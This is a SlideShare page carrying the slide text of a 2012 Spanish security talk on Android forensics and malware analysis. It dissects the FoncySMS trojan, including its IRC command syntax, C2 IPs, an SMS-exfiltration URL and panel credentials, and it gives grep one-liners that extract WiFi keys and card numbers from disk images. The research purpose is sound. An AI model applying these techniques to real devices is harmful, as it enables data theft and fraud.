 
Extendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPSExtendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPSPaloSanto Solutions
 
Extendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortExtendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortJuan Oliva
 
Análisis Forense Memoria RAM
Análisis Forense Memoria RAMAnálisis Forense Memoria RAM
Análisis Forense Memoria RAMConferencias FIST
 
Mario Guerra - Buceando en Windows 10. Extrayendo artefactos forenses de las ...
Mario Guerra - Buceando en Windows 10. Extrayendo artefactos forenses de las ...Mario Guerra - Buceando en Windows 10. Extrayendo artefactos forenses de las ...
Mario Guerra - Buceando en Windows 10. Extrayendo artefactos forenses de las ...RootedCON
 
Lorenzo Martínez - Linux DFIR: My Way! [rooted2019]
Lorenzo Martínez - Linux DFIR: My Way! [rooted2019]Lorenzo Martínez - Linux DFIR: My Way! [rooted2019]
Lorenzo Martínez - Linux DFIR: My Way! [rooted2019]RootedCON
 

Similar a Pimp your Android. Rooted CON 2012. (20)

rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
 
Análisis de malware en Android -.Bsides Chile 2014
Análisis de malware en Android -.Bsides Chile 2014Análisis de malware en Android -.Bsides Chile 2014
Análisis de malware en Android -.Bsides Chile 2014
 
3604299 analisis-criminalistico-forense-con-oss
3604299 analisis-criminalistico-forense-con-oss3604299 analisis-criminalistico-forense-con-oss
3604299 analisis-criminalistico-forense-con-oss
 
Ingeniería Inversa en Android. Rooted Labs. Rooted CON 2012.
Ingeniería Inversa en Android. Rooted Labs. Rooted CON 2012.Ingeniería Inversa en Android. Rooted Labs. Rooted CON 2012.
Ingeniería Inversa en Android. Rooted Labs. Rooted CON 2012.
 
Curso forensics power_tools
Curso forensics power_toolsCurso forensics power_tools
Curso forensics power_tools
 
David Barroso - iPhone + Botnets = FUN! [RootedCON 2010]
David Barroso - iPhone + Botnets = FUN! [RootedCON 2010]David Barroso - iPhone + Botnets = FUN! [RootedCON 2010]
David Barroso - iPhone + Botnets = FUN! [RootedCON 2010]
 
Malware intelligence ppt-slides
Malware intelligence ppt-slidesMalware intelligence ppt-slides
Malware intelligence ppt-slides
 
Informatica forense: Recuperación de la Evidencia Digital.
Informatica forense: Recuperación de la Evidencia Digital.Informatica forense: Recuperación de la Evidencia Digital.
Informatica forense: Recuperación de la Evidencia Digital.
 
Tecnicas avanzadas de ocultamiento de malware
Tecnicas avanzadas de ocultamiento de malwareTecnicas avanzadas de ocultamiento de malware
Tecnicas avanzadas de ocultamiento de malware
 
Extendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPSExtendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPS
 
Extendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortExtendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con Snort
 
Crackers: Tecnicas y Tacticas
Crackers: Tecnicas y Tacticas Crackers: Tecnicas y Tacticas
Crackers: Tecnicas y Tacticas
 
Análisis Forense Memoria RAM
Análisis Forense Memoria RAMAnálisis Forense Memoria RAM
Análisis Forense Memoria RAM
 
2.4 Análisis de Informacion
2.4 Análisis de Informacion2.4 Análisis de Informacion
2.4 Análisis de Informacion
 
Mario Guerra - Buceando en Windows 10. Extrayendo artefactos forenses de las ...
Mario Guerra - Buceando en Windows 10. Extrayendo artefactos forenses de las ...Mario Guerra - Buceando en Windows 10. Extrayendo artefactos forenses de las ...
Mario Guerra - Buceando en Windows 10. Extrayendo artefactos forenses de las ...
 
Seguridad informatica chile
Seguridad informatica chileSeguridad informatica chile
Seguridad informatica chile
 
webminar ataques de fuerza bruta kali linux
webminar ataques de fuerza bruta kali linux webminar ataques de fuerza bruta kali linux
webminar ataques de fuerza bruta kali linux
 
14-Seguridad de la Información
14-Seguridad de la Información14-Seguridad de la Información
14-Seguridad de la Información
 
Lorenzo Martínez - Linux DFIR: My Way! [rooted2019]
Lorenzo Martínez - Linux DFIR: My Way! [rooted2019]Lorenzo Martínez - Linux DFIR: My Way! [rooted2019]
Lorenzo Martínez - Linux DFIR: My Way! [rooted2019]
 
3.redes seguridad
3.redes seguridad3.redes seguridad
3.redes seguridad
 

Más de Internet Security Auditors

Explotando los datos como materia prima del conocimiento
Explotando los datos como materia prima del conocimientoExplotando los datos como materia prima del conocimiento
Explotando los datos como materia prima del conocimientoInternet Security Auditors
 
XIII Jornadas STIC CCN-CERT. OSINT de la información a la inteligencia
XIII Jornadas STIC CCN-CERT. OSINT de la información a la inteligenciaXIII Jornadas STIC CCN-CERT. OSINT de la información a la inteligencia
XIII Jornadas STIC CCN-CERT. OSINT de la información a la inteligenciaInternet Security Auditors
 
Proceso de implementación de los sistemas de gestión ISO 27001 e ISO 22301
Proceso de implementación de los sistemas de gestión ISO 27001 e ISO 22301Proceso de implementación de los sistemas de gestión ISO 27001 e ISO 22301
Proceso de implementación de los sistemas de gestión ISO 27001 e ISO 22301Internet Security Auditors
 
Problemática de implementación de un SGSI o un SGCN en contact centers y BPOs
Problemática de implementación de un SGSI o un SGCN en contact centers y BPOsProblemática de implementación de un SGSI o un SGCN en contact centers y BPOs
Problemática de implementación de un SGSI o un SGCN en contact centers y BPOsInternet Security Auditors
 
PCI DSS en el Cloud: Transferencia Internacional Datos
PCI DSS en el Cloud: Transferencia Internacional DatosPCI DSS en el Cloud: Transferencia Internacional Datos
PCI DSS en el Cloud: Transferencia Internacional DatosInternet Security Auditors
 
Problematicas de PCI DSS en Contact Centers & BPO
Problematicas de PCI DSS en Contact Centers & BPOProblematicas de PCI DSS en Contact Centers & BPO
Problematicas de PCI DSS en Contact Centers & BPOInternet Security Auditors
 
Proteccion de Datos Personales: Conceptos, Sanciones, Metodologia
Proteccion de Datos Personales: Conceptos, Sanciones, MetodologiaProteccion de Datos Personales: Conceptos, Sanciones, Metodologia
Proteccion de Datos Personales: Conceptos, Sanciones, MetodologiaInternet Security Auditors
 
GigaTIC 2017 - Más allá del futuro: Negocio, tecnología y robótica. (Abril 2017)
GigaTIC 2017 - Más allá del futuro: Negocio, tecnología y robótica. (Abril 2017)GigaTIC 2017 - Más allá del futuro: Negocio, tecnología y robótica. (Abril 2017)
GigaTIC 2017 - Más allá del futuro: Negocio, tecnología y robótica. (Abril 2017)Internet Security Auditors
 
RootedCon 2017 - Workshop: IoT Insecurity of Things?
RootedCon 2017 - Workshop: IoT Insecurity of Things?RootedCon 2017 - Workshop: IoT Insecurity of Things?
RootedCon 2017 - Workshop: IoT Insecurity of Things?Internet Security Auditors
 
Cambios de las versiones 3.2, Cuestionarios y Ecosistema de Normas PCI
Cambios de las versiones 3.2, Cuestionarios y Ecosistema de Normas PCICambios de las versiones 3.2, Cuestionarios y Ecosistema de Normas PCI
Cambios de las versiones 3.2, Cuestionarios y Ecosistema de Normas PCIInternet Security Auditors
 
Conferencia sobre Protección de Datos (Bogotá): Errores comunes en la identif...
Conferencia sobre Protección de Datos (Bogotá): Errores comunes en la identif...Conferencia sobre Protección de Datos (Bogotá): Errores comunes en la identif...
Conferencia sobre Protección de Datos (Bogotá): Errores comunes en la identif...Internet Security Auditors
 
Conferencia sobre Protección de Datos (Bogotá): Aprendiendo de las Sanciones
Conferencia sobre Protección de Datos (Bogotá): Aprendiendo de las SancionesConferencia sobre Protección de Datos (Bogotá): Aprendiendo de las Sanciones
Conferencia sobre Protección de Datos (Bogotá): Aprendiendo de las SancionesInternet Security Auditors
 
Catosfera 2016: Anàlisi de xarxes socials amb finalitats d'investigació: ris...
Catosfera 2016: Anàlisi de xarxes socials amb finalitats d'investigació: ris...Catosfera 2016: Anàlisi de xarxes socials amb finalitats d'investigació: ris...
Catosfera 2016: Anàlisi de xarxes socials amb finalitats d'investigació: ris...Internet Security Auditors
 
NcN2015. Técnicas OSINT para investigadores de seguridad.
NcN2015. Técnicas OSINT para investigadores de seguridad.NcN2015. Técnicas OSINT para investigadores de seguridad.
NcN2015. Técnicas OSINT para investigadores de seguridad.Internet Security Auditors
 
Ncn2014. Vigilados: explotando las redes sociales para predecir nuestro compo...
Ncn2014. Vigilados: explotando las redes sociales para predecir nuestro compo...Ncn2014. Vigilados: explotando las redes sociales para predecir nuestro compo...
Ncn2014. Vigilados: explotando las redes sociales para predecir nuestro compo...Internet Security Auditors
 
Cybercamp 2014. Tinfoleak: Analizando nuestras pautas y comportamientos a tr...
Cybercamp 2014. Tinfoleak: Analizando nuestras pautas y comportamientos a tr...Cybercamp 2014. Tinfoleak: Analizando nuestras pautas y comportamientos a tr...
Cybercamp 2014. Tinfoleak: Analizando nuestras pautas y comportamientos a tr...Internet Security Auditors
 
PERUHACK 2014: Cómo cumplir con PCI DSS...sin nombrarla
PERUHACK 2014: Cómo cumplir con PCI DSS...sin nombrarlaPERUHACK 2014: Cómo cumplir con PCI DSS...sin nombrarla
PERUHACK 2014: Cómo cumplir con PCI DSS...sin nombrarlaInternet Security Auditors
 
Hackmeeting 2003: Métodos actuales de apropiación de dominios. Vicente Aguilera
Hackmeeting 2003: Métodos actuales de apropiación de dominios. Vicente AguileraHackmeeting 2003: Métodos actuales de apropiación de dominios. Vicente Aguilera
Hackmeeting 2003: Métodos actuales de apropiación de dominios. Vicente AguileraInternet Security Auditors
 

Más de Internet Security Auditors (20)

Explotando los datos como materia prima del conocimiento
Explotando los datos como materia prima del conocimientoExplotando los datos como materia prima del conocimiento
Explotando los datos como materia prima del conocimiento
 
XIII Jornadas STIC CCN-CERT. OSINT de la información a la inteligencia
XIII Jornadas STIC CCN-CERT. OSINT de la información a la inteligenciaXIII Jornadas STIC CCN-CERT. OSINT de la información a la inteligencia
XIII Jornadas STIC CCN-CERT. OSINT de la información a la inteligencia
 
Proceso de implementación de los sistemas de gestión ISO 27001 e ISO 22301
Proceso de implementación de los sistemas de gestión ISO 27001 e ISO 22301Proceso de implementación de los sistemas de gestión ISO 27001 e ISO 22301
Proceso de implementación de los sistemas de gestión ISO 27001 e ISO 22301
 
Problemática de implementación de un SGSI o un SGCN en contact centers y BPOs
Problemática de implementación de un SGSI o un SGCN en contact centers y BPOsProblemática de implementación de un SGSI o un SGCN en contact centers y BPOs
Problemática de implementación de un SGSI o un SGCN en contact centers y BPOs
 
PCI DSS en el Cloud: Transferencia Internacional Datos
PCI DSS en el Cloud: Transferencia Internacional DatosPCI DSS en el Cloud: Transferencia Internacional Datos
PCI DSS en el Cloud: Transferencia Internacional Datos
 
Problematicas de PCI DSS en Contact Centers & BPO
Problematicas de PCI DSS en Contact Centers & BPOProblematicas de PCI DSS en Contact Centers & BPO
Problematicas de PCI DSS en Contact Centers & BPO
 
PCI DSS: Justificacion del Cumplimiento
PCI DSS: Justificacion del CumplimientoPCI DSS: Justificacion del Cumplimiento
PCI DSS: Justificacion del Cumplimiento
 
Proteccion de Datos Personales: Conceptos, Sanciones, Metodologia
Proteccion de Datos Personales: Conceptos, Sanciones, MetodologiaProteccion de Datos Personales: Conceptos, Sanciones, Metodologia
Proteccion de Datos Personales: Conceptos, Sanciones, Metodologia
 
GigaTIC 2017 - Más allá del futuro: Negocio, tecnología y robótica. (Abril 2017)
GigaTIC 2017 - Más allá del futuro: Negocio, tecnología y robótica. (Abril 2017)GigaTIC 2017 - Más allá del futuro: Negocio, tecnología y robótica. (Abril 2017)
GigaTIC 2017 - Más allá del futuro: Negocio, tecnología y robótica. (Abril 2017)
 
RootedCon 2017 - Workshop: IoT Insecurity of Things?
RootedCon 2017 - Workshop: IoT Insecurity of Things?RootedCon 2017 - Workshop: IoT Insecurity of Things?
RootedCon 2017 - Workshop: IoT Insecurity of Things?
 
PCI DSS en la Nube
PCI DSS en la NubePCI DSS en la Nube
PCI DSS en la Nube
 
Cambios de las versiones 3.2, Cuestionarios y Ecosistema de Normas PCI
Cambios de las versiones 3.2, Cuestionarios y Ecosistema de Normas PCICambios de las versiones 3.2, Cuestionarios y Ecosistema de Normas PCI
Cambios de las versiones 3.2, Cuestionarios y Ecosistema de Normas PCI
 
Conferencia sobre Protección de Datos (Bogotá): Errores comunes en la identif...
Conferencia sobre Protección de Datos (Bogotá): Errores comunes en la identif...Conferencia sobre Protección de Datos (Bogotá): Errores comunes en la identif...
Conferencia sobre Protección de Datos (Bogotá): Errores comunes en la identif...
 
Conferencia sobre Protección de Datos (Bogotá): Aprendiendo de las Sanciones
Conferencia sobre Protección de Datos (Bogotá): Aprendiendo de las SancionesConferencia sobre Protección de Datos (Bogotá): Aprendiendo de las Sanciones
Conferencia sobre Protección de Datos (Bogotá): Aprendiendo de las Sanciones
 
Catosfera 2016: Anàlisi de xarxes socials amb finalitats d'investigació: ris...
Catosfera 2016: Anàlisi de xarxes socials amb finalitats d'investigació: ris...Catosfera 2016: Anàlisi de xarxes socials amb finalitats d'investigació: ris...
Catosfera 2016: Anàlisi de xarxes socials amb finalitats d'investigació: ris...
 
NcN2015. Técnicas OSINT para investigadores de seguridad.
NcN2015. Técnicas OSINT para investigadores de seguridad.NcN2015. Técnicas OSINT para investigadores de seguridad.
NcN2015. Técnicas OSINT para investigadores de seguridad.
 
Ncn2014. Vigilados: explotando las redes sociales para predecir nuestro compo...
Ncn2014. Vigilados: explotando las redes sociales para predecir nuestro compo...Ncn2014. Vigilados: explotando las redes sociales para predecir nuestro compo...
Ncn2014. Vigilados: explotando las redes sociales para predecir nuestro compo...
 
Cybercamp 2014. Tinfoleak: Analizando nuestras pautas y comportamientos a tr...
Cybercamp 2014. Tinfoleak: Analizando nuestras pautas y comportamientos a tr...Cybercamp 2014. Tinfoleak: Analizando nuestras pautas y comportamientos a tr...
Cybercamp 2014. Tinfoleak: Analizando nuestras pautas y comportamientos a tr...
 
PERUHACK 2014: Cómo cumplir con PCI DSS...sin nombrarla
PERUHACK 2014: Cómo cumplir con PCI DSS...sin nombrarlaPERUHACK 2014: Cómo cumplir con PCI DSS...sin nombrarla
PERUHACK 2014: Cómo cumplir con PCI DSS...sin nombrarla
 
Hackmeeting 2003: Métodos actuales de apropiación de dominios. Vicente Aguilera
Hackmeeting 2003: Métodos actuales de apropiación de dominios. Vicente AguileraHackmeeting 2003: Métodos actuales de apropiación de dominios. Vicente Aguilera
Hackmeeting 2003: Métodos actuales de apropiación de dominios. Vicente Aguilera
 

Pimp your Android. Rooted CON 2012.

  • 1. Pimp your Android Sebastián Guerrero – sguerrero@isecauditors.com
  • 2. Agenda • Introducción • Montando lab de investigación. • Trasteando con aplicaciones. • Análisis forense. • Formar un zoológico de malware. • Evolución del malware. • Medidas de seguridad. • Reverseemos algo nuevo. • Desmantelando un C&C • It’s 0-day time. 2
  • 4. Fichero APK • Es un fichero .zip falso • Usado para empacar las aplicaciones • Todo APK incluye: • classes.dex • resources.asc • /res • /META-INF • AndroidManifest.xml
  • 6. Montando un laboratorio • Utilizar la ISO Android Reverse Engineering (A.R.E.) • Herramientas como Androguard, APKInspector, Apktool, AxmlPrinter, Dex2Jar, etc… • Espacio de trabajo ya configurado. • Ideal para máquinas virtuales. • Utilizar uno de los ports de Androix-x86. • Proyecto OpenSource. • Sistema operativo Android. • Entorno fácilmente configurable. • Fluidez. • Crearnos un lab a nuestra medida.
  • 8. Montando un análisis dinámico 1. Creamos una máquina virtual usando el SDK. 2. Lanzamos el emulador y almacenamos las conexiones en un pcap: • emulator –port n @device-name –tcpdump foo.pcap 3. Instalamos la aplicación • adb install appname.apk 4. Lanzamos pruebas sobre el dispositivo y la aplicación • adb shell monkey –v –p package.app n 5. Leemos los logs • adb shell logcat –d 6. Podemos apoyarnos en Wireshark para leer los logs de conexiones.
  • 9. Simulando eventos • Llamadas de teléfono • gsm call p-n • gsm accept p-n • gsm cancel p-n • SMS • sms send prefix-number text • Emular velocidad de red • netspeed gsm n • netspeed umts n • Cambiar coordenadas GPS • geo fix -13… 21…
  • 10. Modus Operandi 1. AXMLPrinter2 – Extraemos la información del AndroidManifest.xml 2. Dex2jar – Convertimos el fichero .dex en un fichero de clases .jar. JAD – Transformamos los ficheros .class en ficheros .jad 3. JDgui – Leemos el código almacenado en el fichero .jar. 4. Understand – Análisis estático del código. 5. Wireshark – Análisis dinámico del código.
  • 11. Analizando la memoria • Trabajamos con arquitectura ARM • Dividida en cinco capas distintas • Cada modelo es diferente, con aplicaciones específicas. • Herramientas de pago. • ¿Qué podemos toquetear aquí? – Tarjeta SIM. – Memoria física (Interna&Externa). – Memoria volátil. (1) Proyecto Android-x86 http://www.android-x86.org/
  • 12. Analizando la memoria • ¿Qué requisitos necesito? – Indispensable ser root en el teléfono: – Tener disponible el Android Debug Driver (ADB) – Es recomendable tener instalado un servicio SSH o FTP • ¿Por dónde empiezo? – Conocer cómo está estructurado el sistema. – Saber cuáles son los directorios asociados a los diferentes puntos de montaje. – Realizar la correlación (NanDroid || (DD && ADB pull)) • ¿Qué técnicas empleo? – Uso de strings y búsqueda de cadenas. – Análisis de las bases de datos. – File carving. – Análisis del sistema de ficheros.
  • 13. Tarjeta SIM • Información a obtener • Número IMSI. • Información sobre localización. • Información sobre tráfico SMS. • Información sobre proveedor. • Información sobre llamadas. • Dispositivo DEKART (35€ ~ 60€) • Características • Dispositivo lectura/escritura USB. • Hace copias de seguridad. • Permite exportar la agenda • Aplicaciones • MOBILedit! • Forensic Card Reader • Oxygen • USIM Detective.
  • 14. Una de strings • Claves WiFi – strings userdata.img | grep psk= • Correos electrónicos – strings userdata.img | egrep “[a-z A-Z_-.]+@[a-z A-Z-.]+.[a-z A-Z-.]+” • Imágenes JPG – strings data.img | grep -oE "(.*.jpe?g|.*.JPE?G)" • Inicios de sesión – Strings userdata.img | grep –n10 “login” • Números de teléfono – strings userdata.img | grep -oE "([0-9]{9})" • Tarjetas de crédito – strings userdata.img | grep -oE "^((4d{3})|(5[1-5]d{2})|(6011))-?d{4}-?d{4}- ?d{4}|3[4,7]d{13}$"
  • 15. Una de BBDDs • Constituye un alto porcentaje del análisis forense. • Toda la información relevante y sensible se encuentra almacenada en estos ficheros. • Suelen encontrarse en /data/data • Backup con adb pull / SSH / FTP / Terminal Emulator… • Consultamos con SQLite3 / SQLviewer…
  • 16. Encryp… What the fcuk! • Llamadas realizadas (com.android.providers.contacts/databases – contacts2.db) • Mensajes (com.android.providers.telephony/databases – mmssms.db) • Whatsapp (com.whatsapp/databases - mgstore.db – wa.db) • Tuenti
  • 17. Encryp… What the fcuk! • Configuración de email (com.google.android.email/databases – EmailProvider.db) • Delicious (Fichero xml) • Facebook
  • 18. La memoria volátil • Debemos de realizar sin tratar de alterar el estado actual del dispositivo. – No podemos apagar o reiniciar el terminal. – Nada de instalar o eliminar aplicaciones. – Cortar todo tipo de acceso a la red. – Modo avión. • Necesitamos ser root. • No disponemos de ninguna API que permita realizar esta labor. • ¿Soluciones? – No es posible acceder a /dev/mem por problemas de seguridad. – Emular dispositivo en /dev/fmem no es posible en Android • Función page_is_ram para comprobar si el desplazamiento a realizar pertenece a la memoria física o no, no existe en arquitectura ARM. • La herramienta DD sólo almacena enteros de 32 bits y desplazamientos más allá de 0x80000000 causan un integer overflow • Volatilitux al poder
  • 19. Volatilitux • Pslist – Listado de los procesos que andan ejecutándose en memoria • Memmap – Mapa de memoria de un proceso. • Memdmp – Memoria direccionable de un proceso. • Filedmp – Dumpea un fichero abierto • Filelist – Muestra ficheros abiertos para un proceso dado
  • 20. Si pierdes el teléfono…
  • 21. Montando SelwoMarina • Android Market • Markets alternativos. – Aptoide – Blapkmarket – snappzmarket • Páginas de aplicaciones. – Mobilism.org – DroidAppz – AndroidFreeware – MalwareDump – Bazaar • Aplicaciones de terceros • Exploits
  • 22. Montando Selwomarina • Organización de información • Almacenamiento y búsqueda por características de las muestras. • Tamaño, tipo, md5, sha1, tags, fechas… • Obtener, almacenar y recuperar elementos de las muestras. • Ficheros generados, Binarios desempaquetados, Exploits, cadenas embebidas. • Almacenar, buscar y devolver información sobre análisis • IDA Pro BD, notas de análisis, artículos y referencias, muestras de red, sistemas • Detección de firmas • Análisis automatizado • Diseño modularizado. • Características de análisis estático • Soporte de múltiples análisis de malware. • Aislamiento de entornos de análisis dinámico.
  • 23. Evolución del malware Nombre Características Riesgo AndroidOS.FakePlayer.a AndroidOS_Droisnake.A AndroidOS.FakePlayer.b AndroidOS.FakePlayer.c Android.Geinimi Android.HongTouTou Android.Pjapps Android.DroidDream Android.BgServ Android.Zeahache Android.Walkinwat Android.Adsms Android.Zsone Android.Spacem Android.LightDD Android/DroidKungFu.A Nombre Características Riesgo Android.Basebridge Android.Uxipp Andr/Plankton-A Android.Jsmshider Android.GGTracker Android.KungFu Variants AndroidOS_Crusewin.A AndroidOS_SpyGold.A DroidDream Light Variant Android.Smssniffer Android.HippoSMS Android.Fokonge Android/Sndapps.A Android.Nickispy Android.Lovetrap Android.Premiumtext Android.NickiBot
  • 24. Vectores de ataque • Amenazas basadas en aplicaciones • Malware • Spyware • Amenazas de privacidad • Vulnerabilidades en aplicaciones • Amenazas basadas en la web • Phishing • Drive-by-downloads • Exploits en navegadores • Amenazas basadas en las redes • Exploits para protocolos de red • Wi-fi sniffing • Amenazas físicas • Pérdida o robo del dispositivo
  • 25. Medidas de seguridad • Da igual si somos usuarios o una entidad corporativa. • Los malos vienen a hacer daño. • Tenemos un tesoro entre nuestras manos. • Somos el eslabón débil. • Toda nuestra vida online (emails, banca, redes sociales, privacidad) está en nuestro teléfono.
  • 26. Medidas de seguridad • Canal de comunicación a través de VPN y enrutar todo el tráfico. • Implementar política de contraseñas fuerte. • Deshabilitar servicios y dispositivos inseguros/innecesarios (GPS/Bluetooth/SDCard/etc…). • Capas de seguridad adicionales • Herramientas de privacidad, antivirus, borrado remoto, localización por GPS. • Deshabilitar instalación de software de terceros. • Habilitar servicios de acceso remoto; SSH, FTP, DropBear, etc…
  • 27. Analizando algo nuevo • Android.FoncySMS • Kaspersky • Risk Level 1: Muy bajo • Descubierto: 15 Enero, 2012 • Actualizado: 30 Enero, 2012 • Actividad: com.android.bot • Descargas: 3370~
  • 28. Información • Investigada por la OCLCTIC. • Investigación durante 2 meses. • “Banda” compuesta por dos miembros (“Cerebro” y técnico). • Envía SMS premium (4.5€). • 100.000€ 20/30€ por cabeza. • Se ha cobrado 2.000 víctimas desde verano del 2011. • Ciudades europeas y Canadá.
  • 29. Lista de permisos • android.permission.READ_LOGS • android.permission.READ_PHONE_STATE • android.permission.WRITE_EXTERNAL_STORAGE • android.permission.INTERNET • android.permission.VIBRATE • android.permission.WAKE_LOCK • android.permission.ACCESS_WIFI_STATE • android.permission.CHANGE_WIFI_STATE • android.permission.CHANGE_NETWORK_STATE • android.permission.ACCESS_NETWORK_STATE • android.permission.MODIFY_AUDIO_SETTINGS com.android.vending.CHECK_LICENSE
  • 30. Instalando la app • Iniciar emulador • Instalar la aplicación. • Revisar el estado actual. • Simular actividad. • Observar el nuevo estado. • Analizar
  • 33. Estructura de la aplicación • Tras la ejecución inicial… • Boomsh – ELF -32 bits LSB executable, ARM version 1 (SYSV), dynamically linked (uses shared library). • Border01.png – Zip archive data. • Footer01.png – ELF -32 bits LSB executable, ARV version 1 (SYSV), dynamically linked (uses shared libs). • Header01.png – ELF – 32bits LSB executable, ARM version 1 (SYSV), dinamically linked (uses shared library). • Rooted - Text file.
  • 34. Footer.png 1. Deja constancia de que el exploit ha tenido éxito. 2. Modifica los permisos de border01 a lectura/escritura (propietario) y escritura (resto). 3. Instala border01 lanzando el administrador de paquetes
  • 35. Footer.png (Round 2) • IRCConnect – Conectar con un servidor IRC. • IRCGenUser – Genera un usuario apoyándose en rand(). • IRCHandler – Manejador de errores. • IRCLogin – Establece sesión con el canal IRC. • IRCPrivmsgParse&IRCParseLine – Parsean las órdenes recibidas. • IRCSend – Realiza envío de mensajes.
  • 36. Footer (La chicha) 1. Establece conexión con 192.68.196.198. 2. Genera nombre de usuario al azar. 3. Se conecta al canal #andros. 4. Queda a la escucha de recibir órdenes. 5. Parsea las líneas que comienza por PRIVMGS
  • 37. Oído cocina • Comandos a ejecutar – PRIVMGS #andros :[SH] - %COMMAND_TO_RUN% – PRIVMGS #andros :[ID] - %REAL_USER_ID% – PRIVMGS #andros :[EXIT] – exiting ordered…
  • 38. Border01 • Permisos sospechosos – android.permission.RECEIVE_SMS – android.permission.SEND_SMS – android.permission.INTERNET
  • 39. AndroidMeActivity 1. Al iniciar la actividad se solicita el código ISO de la ciudad. 2. En base a esto, se establece un número premium u otro. 3. Se realizan 5 envíos a dicho número. • Ciudades a las que realiza el envío • Spain Number: 35024 Message: GOLD • Great Britain Number: 60999 Message: SP2 • Morocco Number: 2052 Message: CODE • Sierra Leone Number: 7604 Message: PASS • Romania Number: 1339 Message: PASS • Norway Number: 2227 Message: PASS • Sweden Number: 72225 Message: PASS • United States Number: 23333 Message: PASS
  • 40. SMSReceiver 1. Se encarga de la lógica del envío de mensajes. 2. Se reservan dos campos; uno para el número del destinatario y otro para el contenido. 3. Sí el SMS provece del número 81083, 3075, 64747, 60999, 63000, 35024, 2052, 7064, 1339, 9903, 2227, 72225, 23333, el broadcast se corta. 4. Establece conexión con 46.166.146.102 y envía el SMS recibido y el número de origen. 1. http://46.166.146.102/?=STR2(cuerpo mensaje)///STR1(número)
  • 41. IRC Botnet • Servidor: Irc.anonops.li / 6667 • Canal: #xxx • User: user • Pass: pass
  • 42. “Desmontando cúpulas” • ¿Objetivo? – Mostrar cómo está organizado y pensado un pequeño y simple C&C para Android. • ¿Qué malware? – Simple Android SMS Trojan. • ¿Funcionamiento? 1. Se instala en el teléfono una aplicación infectada. 2. Espera a que se realice la activación. 3. Se forma un string con el IMEI del usuario y su teléfono. 4. Se envía al C&C y se almacena en una BBDD.
  • 43. Estructura • BBDD: admin_123/123 • Panel: root/entermoney77 • Infecta varias plataformas – Android: mms.apk – Symbian – Nokia s60v3, s60v5 – mms.sis – Resto de plataformas con soporte java – mms.jar
  • 44. Contenido • Almacena la siguiente información: – Fecha infección. – IMEI teléfono. – OS. – IP. – País – Número – Texto • Panel en ruso y sólo registra teléfonos de Rusia. • Procedencia rusa.
  • 45. TapJacking • Vulnerabilidad Touch-Event Hijacking • Mostramos al usuario una interfaz tapadera. • Podemos obligar al usuario a: – Pagarnos unas vacaciones. – Obtener todos los datos del teléfono. – Capturar los movimientos del dispositivo. – Instalar aplicaciones saltándonos los permisos. – Creatividad… • Basada en toasts. • Bueno… ¿Y Google?
  • 47. ¿Cómo está organizado? • Se han diseñado un total de 4 payloads • CallPayload.java – Realiza llamadas al número de indicado. • MarketPayload.java – Descarga e instala aplicaciones del market. • ResetPayload.java – Devuelve al estado de fábrica el teléfono. • SMSPayload.java – Envía un mensaje de texto al número indicado. • TweetPayload.java – Publica un tweet en una cuenta de usuario con sesión iniciada. • http://twitter.com/home?status=Yo me he comida más de una concha Codan por día • Está diseñado para que se puedan añadir payloads por el usuario de forma sencilla. • La estructura interna es la siguiente: • Main.java – Ejecuta el servicio y carga los payloads. • MalwarePayload.java – Abstracción para implementar más fácilmente los payloads. • MalwareService.java – Crea el toast e inicia el proceso de tap-jack. • main.xml – Tiene el layout de la aplicación, lanzando con un evento onClick cada payload. • strings.xml – Contiene las cadenas que son utilizadas en la aplicación.